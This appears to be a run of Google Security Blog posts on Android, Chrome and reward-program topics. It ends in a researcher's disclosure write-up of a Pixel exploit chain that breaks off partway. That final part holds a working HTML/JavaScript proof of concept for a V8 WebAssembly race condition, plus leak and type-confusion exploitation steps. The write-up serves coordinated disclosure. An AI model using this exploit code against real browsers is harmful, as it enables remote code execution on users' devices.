Posted by Jan Keller, Security TPM
Google CTF 2017 was a big success! We had over 5,000 players, nearly 2,000 teams captured flags, we paid $31,1337.00, and most importantly: you had fun playing and we had fun hosting!

Congratulations (for the second year) to the team pasten, from Israel, for scoring first place in both the quals and the finals. Also, for everyone who hasn’t played yet or wants to play again, we have open-sourced the 2017 challenges in our GitHub repository.


Hence, we are excited to announce Google CTF 2018:

  • Date and time: 00:00:01 UTC on June 23rd and 24th, 2018
  • Location: Online
  • Prizes: Big checks, swag and rewards for creative write-ups
The winning teams will compete again for a spot at the Google CTF Finals later this year (more details on the Finals soon).


For beginners and veterans alike

Based on the feedback we received, we plan to have additional challenges this year where people who may be new to CTFs or security can learn about, and try their hands at, some security challenges. These will be presented in a “Quest” style: a scenario similar to a real-world penetration testing environment. We hope this will give people a chance to sharpen their skills, learn something new about CTFs and security, and see the real-world value of information security and its broader impact.

We hope to virtually see you at the 3rd annual Google CTF on June 23rd, 2018 at 00:00:01 UTC. Check g.co/ctf or subscribe to our mailing list for more details as they become available.
Why do we host these competitions?

We outlined our philosophy last year, but in short: we believe that the security community helps us better protect Google users, and so we want to nurture the community and give back in a fun way.

Thirsty for more?

There are a lot of opportunities for you to help us make the Internet a safer place.
Posted by Elie Bursztein, Anti-Abuse Research Lead, and Ian Goodfellow, Adversarial Machine Learning Research Lead

Recent advances in AI are transforming how we combat fraud and abuse and implement new security protections. These advances are critical to meeting our users’ expectations and keeping increasingly sophisticated attackers at bay, but they come with brand new challenges as well.

This week at RSA, we explored the intersection between AI, anti-abuse, and security in two talks.

Our first talk provided a concise overview of how we apply AI to fraud and abuse problems. The talk started by detailing the fundamental reasons why AI is key to building defenses that keep up with user expectations and combat increasingly sophisticated attacks. It then delved into the top 10 anti-abuse specific challenges encountered while applying AI to abuse fighting and how to overcome them. Check out the infographic at the end of the post for a quick overview of the challenges we covered during the talk.

Our second talk looked at attacks on ML models themselves and the ongoing effort to develop new defenses.

It covered attackers’ attempts to recover private training data, to introduce examples into the training set of a machine learning model to cause it to learn incorrect behaviors, to modify the input that a machine learning model receives at classification time to cause it to make a mistake, and more.

Our talk also looked at various defense solutions, including differential privacy, which provides a rigorous theoretical framework for preventing attackers from recovering private training data.
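To make that concrete, here is a minimal sketch of the Laplace mechanism, one standard differential-privacy building block (this is not code from the talk; the class and method names, and the choice of a counting query with sensitivity 1, are illustrative assumptions):

import java.util.Random;

public class LaplaceMechanism {
    // Sample Laplace(0, scale) noise via inverse-CDF sampling
    // (ignoring the measure-zero edge case u == -0.5).
    static double laplaceNoise(double scale, Random rng) {
        double u = rng.nextDouble() - 0.5; // uniform in [-0.5, 0.5)
        return -scale * Math.signum(u) * Math.log(1.0 - 2.0 * Math.abs(u));
    }

    // Release a count with epsilon-differential privacy. A counting query
    // has sensitivity 1: one user joining or leaving changes it by at most 1.
    static double privateCount(long trueCount, double epsilon, Random rng) {
        double sensitivity = 1.0;
        return trueCount + laplaceNoise(sensitivity / epsilon, rng);
    }

    public static void main(String[] args) {
        System.out.println(privateCount(42000, 0.5, new Random()));
    }
}

Smaller values of epsilon add more noise and give a stronger privacy guarantee.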

Hopefully you were able to join us at RSA! But if not, here are the recording and slides of our first talk on applying AI to abuse prevention, along with the slides from our second talk about protecting ML models.

Posted by Erik Kline, Android software engineer, and Ben Schwartz, Jigsaw software engineer

[Cross-posted from the Android Developers Blog]

The first step of almost every connection on the internet is a DNS query. A client, such as a smartphone, typically uses a DNS server provided by the Wi-Fi or cellular network. The client asks this DNS server to convert a domain name, like www.google.com, into an IP address, like 2607:f8b0:4006:80e::2004. Once the client has the IP address, it can connect to its intended destination.
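In code, that lookup is usually a single resolver call. As a minimal sketch using the system resolver (the hostname is just an example):

import java.net.InetAddress;

public class Resolve {
    public static void main(String[] args) throws Exception {
        // Ask the system resolver (typically the network-provided DNS
        // server) to translate a name into one or more IP addresses.
        for (InetAddress addr : InetAddress.getAllByName("www.google.com")) {
            System.out.println(addr.getHostAddress());
        }
    }
}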

When the DNS protocol was designed in the 1980s, the internet was a much smaller, simpler place. For the past few years, the Internet Engineering Task Force (IETF) has worked to define a new DNS protocol that provides users with the latest protections for security and privacy. The protocol is called "DNS over TLS" (standardized as RFC 7858).

Like HTTPS, DNS over TLS uses the TLS protocol to establish a secure channel to the server. Once the secure channel is established, DNS queries and responses can't be read or modified by anyone else who might be monitoring the connection. (The secure channel only applies to DNS, so it can't protect users from other kinds of security and privacy violations.)

DNS over TLS in P

The Android P Developer Preview includes built-in support for DNS over TLS. We added a Private DNS mode to the Network & internet settings.
By default, devices automatically upgrade to DNS over TLS if a network's DNS server supports it. But users who don't want to use DNS over TLS can turn it off.

Users can enter a hostname if they want to use a private DNS provider. Android then sends all DNS queries over a secure channel to this server or marks the network as "No internet access" if it can't reach the server. (For testing purposes, see this community-maintained list of compatible servers.)

DNS over TLS mode automatically secures the DNS queries from all apps on the system. However, apps that perform their own DNS queries, instead of using the system's APIs, must ensure that they do not send insecure DNS queries when the system has a secure connection. Apps can get this information using a new API: LinkProperties.isPrivateDnsActive().
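For example, an app with its own resolver could consult the active network's LinkProperties before sending any queries of its own. A minimal sketch against the Android P APIs (the helper class is illustrative; it requires the ACCESS_NETWORK_STATE permission):

import android.content.Context;
import android.net.ConnectivityManager;
import android.net.LinkProperties;
import android.net.Network;

class PrivateDnsCheck {
    // Returns true when the system is resolving DNS over TLS, in which
    // case the app must not fall back to sending insecure DNS queries.
    static boolean isPrivateDnsActive(Context context) {
        ConnectivityManager cm =
                (ConnectivityManager) context.getSystemService(Context.CONNECTIVITY_SERVICE);
        Network network = cm.getActiveNetwork();
        LinkProperties lp = (network == null) ? null : cm.getLinkProperties(network);
        return lp != null && lp.isPrivateDnsActive();
    }
}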

With the Android P Developer Preview, we're proud to present built-in support for DNS over TLS. In the future, we hope that all operating systems will include secure transports for DNS, to provide better protection and privacy for all users on every new connection.
Posted by Chad Brubaker, Senior Software Engineer Android Security
[Cross-posted from the Android Developers Blog]

Android is committed to keeping users, their devices, and their data safe. One of the ways that we keep data safe is by protecting all data that enters or leaves an Android device with Transport Layer Security (TLS) in transit. As we announced in our Android P developer preview, we're further improving these protections by preventing apps that target Android P from allowing unencrypted connections by default.

This follows a variety of changes we've made over the years to better protect Android users. To prevent accidental unencrypted connections, we introduced the android:usesCleartextTraffic manifest attribute in Android Marshmallow. In Android Nougat, we extended that attribute by creating the Network Security Config feature, which allows apps to indicate that they do not intend to send network traffic without encryption. In Android Nougat and Oreo, we still allowed cleartext connections.

How do I update my app?

If your app uses TLS for all connections then you have nothing to do. If not, update your app to use TLS to encrypt all connections. If you still need to make cleartext connections, keep reading for some best practices.

Why should I use TLS?

Android considers all networks potentially hostile, so traffic should be encrypted at all times, for all connections. Mobile devices are especially at risk because they regularly connect to many different networks, such as the Wi-Fi at a coffee shop.

All traffic should be encrypted, regardless of content, as any unencrypted connections can be used to inject content, increase attack surface for potentially vulnerable client code, or track the user. For more information, see our past blog post and Developer Summit talk.

Isn't TLS slow?

No, it's not.

How do I use TLS in my app?

Once your server supports TLS, simply change the URLs in your app and server responses from http:// to https://. Your HTTP stack handles the TLS handshake without any more work.

If you are making sockets yourself, use an SSLSocketFactory instead of a SocketFactory. Take extra care to use the socket correctly as SSLSocket doesn't perform hostname verification. Your app needs to do its own hostname verification, preferably by calling getDefaultHostnameVerifier() with the expected hostname. Further, beware that HostnameVerifier.verify() doesn't throw an exception on error but instead returns a boolean result that you must explicitly check.
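Putting those warnings together, a minimal sketch of opening a raw TLS socket with explicit hostname verification (the helper class and its host/port parameters are illustrative):

import javax.net.ssl.HostnameVerifier;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLPeerUnverifiedException;
import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;

class TlsSocket {
    static SSLSocket connectSecurely(String host, int port) throws Exception {
        SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault();
        SSLSocket socket = (SSLSocket) factory.createSocket(host, port);
        socket.startHandshake(); // certificate chain validation happens here...
        // ...but hostname verification does not. Check the boolean result
        // explicitly, since verify() does not throw on failure.
        HostnameVerifier verifier = HttpsURLConnection.getDefaultHostnameVerifier();
        if (!verifier.verify(host, socket.getSession())) {
            socket.close();
            throw new SSLPeerUnverifiedException("Certificate does not match " + host);
        }
        return socket;
    }
}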

I need to use cleartext traffic to …

While you should use TLS for all connections, it's possible that you need to use cleartext traffic for legacy reasons, such as connecting to some servers. To do this, change your app's network security config to allow those connections.

We've included a couple of example configurations. See the network security config documentation for more help.

Allow cleartext connections to a specific domain

If you need to allow connections to a specific domain or set of domains, you can use the following config as a guide:
<network-security-config>
    <domain-config cleartextTrafficPermitted="true">
        <domain includeSubdomains="true">insecure.example.com</domain>
        <domain includeSubdomains="true">insecure.cdn.example.com</domain>
    </domain-config>
</network-security-config>
Allow connections to arbitrary insecure domains

If your app supports opening arbitrary content from URLs over insecure connections, you should disable cleartext connections to your own services while supporting cleartext connections to arbitrary hosts. Keep in mind that you should be cautious about the data received over insecure connections as it could have been tampered with in transit.

<network-security-config>
    <domain-config cleartextTrafficPermitted="false">
        <domain includeSubdomains="true">example.com</domain>
        <domain includeSubdomains="true">cdn.example2.com</domain>
    </domain-config>
    <base-config cleartextTrafficPermitted="true" />
</network-security-config>

How do I update my library?

If your library directly creates secure/insecure connections, make sure that it honors the app's cleartext settings by checking isCleartextTrafficPermitted before opening any cleartext connection.
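As a sketch, a library's connection helper might fail closed like this (isCleartextTrafficPermitted is the real platform API, available per-host from API level 24; the surrounding helper class is illustrative):

import android.security.NetworkSecurityPolicy;
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.URL;

class LibraryConnections {
    static HttpURLConnection open(String host, boolean useTls) throws IOException {
        if (!useTls
                && !NetworkSecurityPolicy.getInstance().isCleartextTrafficPermitted(host)) {
            // The app has opted out of cleartext to this host: fail closed
            // rather than silently sending unencrypted traffic.
            throw new IOException("Cleartext to " + host + " is not permitted");
        }
        String scheme = useTls ? "https" : "http";
        return (HttpURLConnection) new URL(scheme + "://" + host + "/").openConnection();
    }
}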
Posted by Dave Kleidermacher, Vice President of Security for Android, Play, ChromeOS

Our team’s goal is simple: secure more than two billion Android devices. It’s our entire focus, and we’re constantly working to improve our protections to keep users safe.
Today, we’re releasing our fourth annual Android Security Year in Review. We compile these reports to help educate the public about the many different layers of Android security, and also to hold ourselves accountable so that anyone can track our security work over time.
We saw really positive momentum last year and this post includes some, but not nearly all, of the major moments from 2017. To dive into all the details, you can read the full report at: g.co/AndroidSecurityReport2017

Google Play Protect

In May, we announced Google Play Protect, a new home for the suite of Android security services on nearly two billion devices. While many of Play Protect’s features had been securing Android devices for years, we wanted to make these more visible to help assure people that our security protections are constantly working to keep them safe.

Play Protect’s core objective is to shield users from Potentially Harmful Apps, or PHAs. Every day, it automatically reviews more than 50 billion apps, other potential sources of PHAs, and devices themselves and takes action when it finds any.

Play Protect uses a variety of different tactics to keep users and their data safe, but the impact of machine learning is already quite significant: 60.3% of all Potentially Harmful Apps were detected via machine learning, and we expect this to increase in the future.
Protecting users' devices
Play Protect automatically checks Android devices for PHAs at least once every day, and users can conduct an additional review at any time for some extra peace of mind. These automatic reviews enabled us to remove nearly 39 million PHAs last year.

We also update Play Protect to respond to trends that we detect across the ecosystem. For instance, we recognized that nearly 35% of new PHA installations were occurring when a device was offline or had lost network connectivity. As a result, in October 2017, we enabled offline scanning in Play Protect, and have since prevented 10 million more PHA installs.


Preventing PHA downloads
Devices that downloaded apps exclusively from Google Play were nine times less likely to get a PHA than devices that downloaded apps from other sources. And these security protections continue to improve, partially because of Play Protect’s increased visibility into newly submitted apps to Play. It reviewed 65% more Play apps compared to 2016.

Play Protect also doesn’t just secure Google Play—it helps protect the broader Android ecosystem as well. Thanks in large part to Play Protect, the installation rates of PHAs from outside of Google Play dropped by more than 60%.



Security updates


While Google Play Protect is a great shield against PHAs, we also partner with device manufacturers to make sure that the version of Android running on users' devices is up to date and secure.

Throughout the year, we worked to improve the process for releasing security updates, and 30% more devices received security patches than in 2016. Furthermore, no critical security vulnerabilities affecting the Android platform were publicly disclosed without an update or mitigation available for Android devices. This was possible due to the Android Security Rewards Program, enhanced collaboration with the security researcher community, coordination with industry partners, and built-in security features of the Android platform.


New security features in Android Oreo


We introduced a slew of new security features in Android Oreo: making it safer to get apps, dropping insecure network protocols, providing more user control over identifiers, hardening the kernel, and more.

We highlighted many of these over the course of the year, but some may have flown under the radar. For example, we updated the overlay API so that apps can no longer block the entire screen and prevent you from dismissing them, a common tactic employed by ransomware.


Openness makes Android security stronger


We’ve long said it, but it remains truer than ever: Android’s openness helps strengthen our security protections. For years, the Android ecosystem has benefitted from researchers’ findings, and 2017 was no different.

Security reward programs
We continued to see great momentum with our Android Security Rewards program: we paid researchers $1.28 million, pushing our total rewards past $2 million since the program began. We also increased our top-line payouts for exploits that compromise TrustZone or Verified Boot from $50,000 to $200,000, and for remote kernel exploits from $30,000 to $150,000.

In parallel, we introduced the Google Play Security Rewards Program and offered a bonus bounty to researchers who discover and disclose select critical vulnerabilities in apps hosted on Play to their developers.

External security competitions
Our teams also participated in external vulnerability discovery and disclosure competitions, such as Mobile Pwn2Own. At the 2017 Mobile Pwn2Own competition, no exploits successfully compromised the Google Pixel. And of the exploits demonstrated against devices running Android, none could be reproduced on a device running unmodified Android source code from the Android Open Source Project (AOSP).



We’re pleased to see the positive momentum behind Android security, and we’ll continue our work to improve our protections this year, and beyond. We will never stop our work to ensure the security of Android users.
Posted by Devon O’Brien, Ryan Sleevi, Emily Stark, Chrome security team

We previously announced plans to deprecate Chrome’s trust in the Symantec certificate authority (including Symantec-owned brands like Thawte, VeriSign, Equifax, GeoTrust, and RapidSSL). This post outlines how site operators can determine if they’re affected by this deprecation, and if so, what needs to be done and by when. Failure to replace these certificates will result in site breakage in upcoming versions of major browsers, including Chrome.

Chrome 66

If your site is using an SSL/TLS certificate from Symantec that was issued before June 1, 2016, it will stop functioning in Chrome 66, which could already be impacting your users.
If you are uncertain about whether your site is using such a certificate, you can preview these changes in Chrome Canary to see if your site is affected. If connecting to your site displays a certificate error or a warning in DevTools as shown below, you’ll need to replace your certificate. You can get a new certificate from any trusted CA, including Digicert, which recently acquired Symantec’s CA business.
An example of a certificate error that Chrome 66 users might see if you are using a Legacy Symantec SSL/TLS certificate that was issued before June 1, 2016. 
The DevTools message you will see if you need to replace your certificate before Chrome 66.

Chrome 66 has already been released to the Canary and Dev channels, meaning affected sites are already impacting users of these Chrome channels. If affected sites do not replace their certificates by March 15, 2018, Chrome Beta users will begin experiencing the failures as well. You are strongly encouraged to replace your certificate as soon as possible if your site is currently showing an error in Chrome Canary.

Chrome 70

Starting in Chrome 70, all remaining Symantec SSL/TLS certificates will stop working, resulting in a certificate error like the one shown above. To check if your certificate will be affected, visit your site in Chrome today and open up DevTools. You’ll see a message in the console telling you if you need to replace your certificate.
The DevTools message you will see if you need to replace your certificate before Chrome 70.
If you see this message in DevTools, you’ll want to replace your certificate as soon as possible. If the certificates are not replaced, users will begin seeing certificate errors on your site as early as July 20, 2018. The first Chrome 70 Beta release will be around September 13, 2018.

Expected Chrome Release Timeline

The table below shows the First Canary, First Beta and Stable Release for Chrome 66 and 70. The first impact from a given release will coincide with the First Canary, reaching a steadily widening audience as the release hits Beta and then ultimately Stable. Site operators are strongly encouraged to make the necessary changes to their sites before the First Canary release for Chrome 66 and 70, and no later than the corresponding Beta release dates.
Release      First Canary        First Beta             Stable Release
Chrome 66    January 20, 2018    ~ March 15, 2018       ~ April 17, 2018
Chrome 70    ~ July 20, 2018     ~ September 13, 2018   ~ October 16, 2018

For information about the release timeline for a particular version of Chrome, you can also refer to the Chromium Development Calendar which will be updated should release schedules change.

In order to address the needs of certain enterprise users, Chrome will also implement an Enterprise Policy that allows disabling the Legacy Symantec PKI distrust starting with Chrome 66. As of January 1, 2019, this policy will no longer be available and the Legacy Symantec PKI will be distrusted for all users.


Special Mention: Chrome 65

As noted in the previous announcement, SSL/TLS certificates from the Legacy Symantec PKI issued after December 1, 2017 are no longer trusted. This should not affect most site operators, as it requires entering into a special agreement with DigiCert to obtain such certificates. Accessing a site serving such a certificate will fail and the request will be blocked as of Chrome 65. To avoid such errors, ensure that such certificates are only served to legacy devices and not to browsers such as Chrome.
Posted by Emily Schechter, Chrome Security Product Manager
For the past several years, we’ve moved toward a more secure web by strongly advocating that sites adopt HTTPS encryption. And within the last year, we’ve also helped users understand that HTTP sites are not secure by gradually marking a larger subset of HTTP pages as “not secure”. Beginning in July 2018 with the release of Chrome 68, Chrome will mark all HTTP sites as “not secure”.

In Chrome 68, the omnibox will display “Not secure” for all HTTP pages.


Developers have been transitioning their sites to HTTPS and making the web safer for everyone. Progress last year was incredible, and it’s continued since then:

  • Over 68% of Chrome traffic on both Android and Windows is now protected
  • Over 78% of Chrome traffic on both Chrome OS and Mac is now protected
  • 81 of the top 100 sites on the web use HTTPS by default
Chrome is dedicated to making it as easy as possible to set up HTTPS. Mixed content audits are now available to help developers migrate their sites to HTTPS in the latest Node CLI version of Lighthouse, an automated tool for improving web pages. The new audit in Lighthouse helps developers find which resources a site loads using HTTP, and which of those are ready to be upgraded to HTTPS simply by changing the subresource reference to the HTTPS version.

Lighthouse is an automated developer tool for improving web pages.

Chrome’s new interface will help users understand that all HTTP sites are not secure, and continue to move the web towards a secure HTTPS web by default. HTTPS is easier and cheaper than ever before, and it unlocks both performance improvements and powerful new features that are too sensitive for HTTP. Developers, check out our set-up guides to get started.
Posted by Jan Keller, Google VRP Technical Pwning Master
As we kick off a new year, we wanted to take a moment to look back at the Vulnerability Reward Program in 2017. It joins our past retrospectives for 2014, 2015, and 2016, and shows the course our VRPs have taken.

At the heart of this blog post is a big thank you to the security research community. You continue to help make Google’s users and our products more secure. We look forward to continuing our collaboration with the community in 2018 and beyond!

2017, By the Numbers

Here’s an overview of how we rewarded researchers for their reports to us in 2017:
We awarded researchers more than $1 million for vulnerabilities they found and reported in Google products, and a similar amount for Android. Combined with our Chrome awards, we awarded researchers nearly $3 million overall for their reports last year.

Drilling down a bit further, we awarded $125,000 to more than 50 security researchers from all around the world through our Vulnerability Research Grants Program, and $50,000 to the hard-working folks who improve the security of open-source software as part of our Patch Rewards Program.

A few bug highlights

Every year, a few bug reports stand out: the research may have been especially clever, the vulnerability may have been especially serious, or the report may have been especially fun and quirky!

Here are a few of our favorites from 2017:

  • In August, researcher Guang Gong outlined an exploit chain on Pixel phones which combined a remote code execution bug in the sandboxed Chrome render process with a subsequent sandbox escape through Android’s libgralloc. As part of the Android Security Rewards Program he received the largest reward of the year: $112,500. The Pixel was the only device that wasn’t exploited during last year’s annual Mobile Pwn2Own competition, and Guang’s report helped strengthen its protections even further.
  • Researcher "gzobqq" received the $100,000 pwnium award for a chain of bugs across five components that achieved remote code execution in Chrome OS guest mode.
  • Alex Birsan discovered that anyone could have gained access to internal Google Issue Tracker data. He detailed his research here, and we awarded him $15,600 for his efforts.

Making Android and Play even safer

Over the course of the year, we continued to develop our Android and Play Security Reward programs.

No one had claimed the top reward for an Android exploit chain in more than two years, so we announced that the top reward for a remote exploit chain, or an exploit leading to TrustZone or Verified Boot compromise, would increase from $50,000 to $200,000. We also increased the top-end reward for a remote kernel exploit from $30,000 to $150,000.


In October, we introduced the by-invitation-only Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play.


Today, we’re expanding the range of rewards for remote code executions from $1,000 to $5,000. We’re also introducing a new category that includes vulnerabilities that could result in the theft of users’ private data, information being transferred unencrypted, or bugs that result in access to protected app components. We’ll award $1,000 for these bugs. For more information visit the Google Play Security Reward Program site.


And finally, we want to give a shout-out to the researchers who’ve submitted fuzzers to the Chrome Fuzzer Program: they get rewards for every eligible bug their fuzzers find without having to do any more work, or even file a bug.


Given how well things have been going these past years, we look forward to our Vulnerability Rewards Programs resulting in even more user protection in 2018 thanks to the hard work of the security research community.

* Andrew Whalley (Chrome VRP), Mayank Jain (Android Security Rewards), and Renu Chaudhary (Google Play VRP) contributed mightily to help lead these Google-wide efforts.

Posted by Alex Wozniak, Software Engineer, Safe Browsing Team
In May 2016, we introduced the latest version of the Google Safe Browsing API (v4). Since this launch, thousands of developers around the world have adopted the API to protect over 3 billion devices from unsafe web resources.

Coupled with that announcement was the deprecation of legacy Safe Browsing APIs, v2 and v3. Today we are announcing an official turn-down date of October 1st, 2018, for these APIs. All v2 and v3 clients must transition to the v4 API prior to this date.

To make the switch easier, an open source implementation of the Update API (v4) is available on GitHub. Android developers always get the latest version of Safe Browsing’s data and protocols via the SafetyNet Safe Browsing API. Getting started is simple; all you need is a Google Account, Google Developer Console project, and an API key.
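For instance, an Android app can check URLs through the SafetyNet Safe Browsing API. A minimal sketch (the API key and URL are placeholders, and the initSafeBrowsing() setup call plus error handling are elided):

import com.google.android.gms.safetynet.SafeBrowsingThreat;
import com.google.android.gms.safetynet.SafetyNet;

// Inside some component with a Context; SAFE_BROWSING_API_KEY is your
// key from the Google Developer Console.
SafetyNet.getClient(context)
        .lookupUri("https://example.com/", SAFE_BROWSING_API_KEY,
                SafeBrowsingThreat.TYPE_POTENTIALLY_HARMFUL_APPLICATION,
                SafeBrowsingThreat.TYPE_SOCIAL_ENGINEERING)
        .addOnSuccessListener(response -> {
            // An empty threat list means Safe Browsing knows of no threats
            // for this URL; otherwise inspect each threat's type.
            boolean safe = response.getDetectedThreats().isEmpty();
        });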

For questions or feedback, join the discussion with other developers on the Safe Browsing Google Group. Visit our website for the latest information on Safe Browsing.
Posted by the Android security team

[Cross-posted from the Android Developers Blog]

In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, the highest reward in the history of the ASR program, plus $7,500 from the Chrome Rewards program, for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues.
All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation.
The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in the Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University.
The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.
Technical details of a Pixel remote exploit chain

The Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain, the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process.
This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in the sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.0.3112.107 + Android 7.1.2 (security patch level 2017-08-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys).
The RCE bug (CVE-2017-5116)

New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism for sharing memory between JavaScript workers and synchronizing control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers; it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages such as C/C++ with a compilation target so that they can run on the web. By combining three features in Chrome, SharedArrayBuffer, WebAssembly, and web workers, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access.
The buggy code is in the function GetFirstArgumentAsBytes, where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is introduced to JavaScript, a TypedArray may be backed by a SharedArrayBuffer, so the contents of the TypedArray may be modified by other worker threads at any time.
i::wasm::ModuleWireBytes GetFirstArgumentAsBytes(
    const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) {
  ......
  } else if (source->IsTypedArray()) { //---> source should be checked if it's backed by a SharedArrayBuffer
    // A TypedArray was passed.
    Local<TypedArray> array = Local<TypedArray>::Cast(source);
    Local<ArrayBuffer> buffer = array->Buffer();
    ArrayBuffer::Contents contents = buffer->GetContents();
    start =
        reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset();
    length = array->ByteLength();
  }
  ......
  return i::wasm::ModuleWireBytes(start, start + length);
}
A simple PoC is as follows:
<html>
<h1>poc</h1>
<script id="worker1">
worker: {
  self.onmessage = function(arg) {
    console.log("worker started");
    var ta = new Uint8Array(arg.data);
    var i = 0;
    while (1) {
      if (i == 0) {
        i = 1;
        ta[51] = 0;   //---> 4) modify the WebAssembly code at the same time
      } else {
        i = 0;
        ta[51] = 128;
      }
    }
  }
}
</script>
<script>
function getSharedTypedArray() {
  var wasmarr = [
    0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
    0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03,
    0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e,
    0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65,
    0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01,
    0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b,
    0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b];
  var sb = new SharedArrayBuffer(wasmarr.length);  //---> 1) put WebAssembly code in a SharedArrayBuffer
  var sta = new Uint8Array(sb);
  for (var i = 0; i < sta.length; i++)
    sta[i] = wasmarr[i];
  return sta;
}
var blob = new Blob([
  document.querySelector('#worker1').textContent
], { type: "text/javascript" })
var worker = new Worker(window.URL.createObjectURL(blob));  //---> 2) create a web worker
var sta = getSharedTypedArray();
worker.postMessage(sta.buffer);  //---> 3) pass the WebAssembly code to the web worker
setTimeout(function() {
  while (1) {
    try {
      sta[51] = 0;
      var myModule = new WebAssembly.Module(sta);  //---> 4) parse the WebAssembly code
      var myInstance = new WebAssembly.Instance(myModule);
      //myInstance.exports.getAnswerPlus1();
    } catch (e) {
    }
  }
}, 1000);
//worker.terminate();
</script>
</html>
The text format of the WebAssembly code is as follows:
00002b func[0]:
00002d: 41 2a | i32.const 42
00002f: 0b | end
000030 func[1]:
000032: 10 00 | call 0
000034: 41 01 | i32.const 1
000036: 6a | i32.add
000037: 0b | end
First, the above binary-format WebAssembly code is put into a SharedArrayBuffer, then a TypedArray object is created using the SharedArrayBuffer as its buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly code, the worker thread modifies the SharedArrayBuffer at the same time. Under these circumstances, the race condition causes a TOCTOU issue: after the main thread's bounds check, the instruction "call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs.
Because the "call 0" WebAssembly instruction can be modified to call any other WebAssembly function, the exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped to WebAssembly memory. Because function 0 and function $leak have a different number of arguments, this leaks many useful pieces of data from the stack.
 (func $leak(param i32 i32 i32 i32 i32 i32)(result i32)
i32.const 0
get_local 0
i32.store
i32.const 4
get_local 1
i32.store
i32.const 8
get_local 2
i32.store
i32.const 12
get_local 3
i32.store
i32.const 16
get_local 4
i32.store
i32.const 20
get_local 5
i32.store
i32.const 0
))
Not only can the instruction "call 0" be modified; any "call funcx" instruction can be modified. Assume funcx is a wasm function with six arguments, as follows. When v8 compiles funcx for the ia32 architecture, the first five arguments are passed through registers and the sixth argument is passed through the stack. All of the arguments can be set to any value by JavaScript:
/*Text format of funcx*/
(func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32)
get_local 5
get_local 4
i32.add)
/*Disassembly code of funcx*/
--- Code ---
kind = WASM_FUNCTION
name = wasm#1
compiler = turbofan
Instructions (size = 20)
0x58f87600 0 8b442404 mov eax,[esp+0x4]
0x58f87604 4 03c6 add eax,esi
0x58f87606 6 c20400 ret 0x4
0x58f87609 9 0f1f00 nop
Safepoints (size = 8)
RelocInfo (size = 0)
--- End code ---
When a JavaScript function calls a WebAssembly function, the v8 compiler internally creates a JS_TO_WASM function; after compilation, the JavaScript function calls the created JS_TO_WASM function, which in turn calls the WebAssembly function. JS_TO_WASM functions use a different calling convention: their first argument is passed through the stack. Suppose "call funcx" is modified to call the following JS_TO_WASM function:
/*Disassembly code of JS_TO_WASM function */
--- Code ---
kind = JS_TO_WASM_FUNCTION
name = js-to-wasm#0
compiler = turbofan
Instructions (size = 170)
0x4be08f20 0 55 push ebp
0x4be08f21 1 89e5 mov ebp,esp
0x4be08f23 3 56 push esi
0x4be08f24 4 57 push edi
0x4be08f25 5 83ec08 sub esp,0x8
0x4be08f28 8 8b4508 mov eax,[ebp+0x8]
0x4be08f2b b e8702e2bde call 0x2a0bbda0 (ToNumber) ;; code: BUILTIN
0x4be08f30 10 a801 test al,0x1
0x4be08f32 12 0f852a000000 jnz 0x4be08f62 <+0x42>
The JS_TO_WASM function takes the sixth argument of funcx as its first argument, but it treats that first argument as an object pointer, so a type confusion is triggered when the argument is passed to the ToNumber function. This means we can pass any value as an object pointer to ToNumber. So we can fake an ArrayBuffer object at some address, such as inside a double array, and pass that address to ToNumber. The layout of an ArrayBuffer is as follows:
/* ArrayBuffer layouts 40 Bytes*/                                                                                                                         
Map
Properties
Elements
ByteLength
BackingStore
AllocationBase
AllocationLength
Fields
internal
internal
